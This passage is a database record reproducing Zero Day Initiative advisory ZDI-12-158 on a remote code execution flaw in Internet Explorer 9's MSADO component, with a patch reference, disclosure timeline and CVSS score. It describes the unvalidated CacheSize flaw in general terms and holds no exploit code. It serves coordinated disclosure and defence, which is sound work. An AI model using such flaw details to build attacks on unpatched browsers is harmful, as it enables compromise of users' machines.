Products:\r\nMicrosoft Internet Explorer 9\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 10761.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. User interaction\r\nis required to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the MSADO component. When handling a\r\nuser-specified CacheSize property, the process uses this value to calculate\r\nthe 'real' cache size. This value is used without proper validation. A\r\nremote attacker can exploit this vulnerability to execute arbitrary code\r\nunder the context of the browser. This bug is a failed fix for\r\nCVE-2011-0027 / http://www.zerodayinitiative.com/advisories/ZDI-11-002/\r\n\r\n\r\n- -- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-045\r\n\r\n- -- Disclosure Timeline:\r\n2012-02-13 - Vulnerability reported to vendor\r\n2012-08-22 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n* Anonymous\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. 
TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n", "modified": "2012-08-26T00:00:00", "published": "2012-08-26T00:00:00", "id": "SECURITYVULNS:DOC:28402", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28402", "title": "ZDI-12-158 : Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}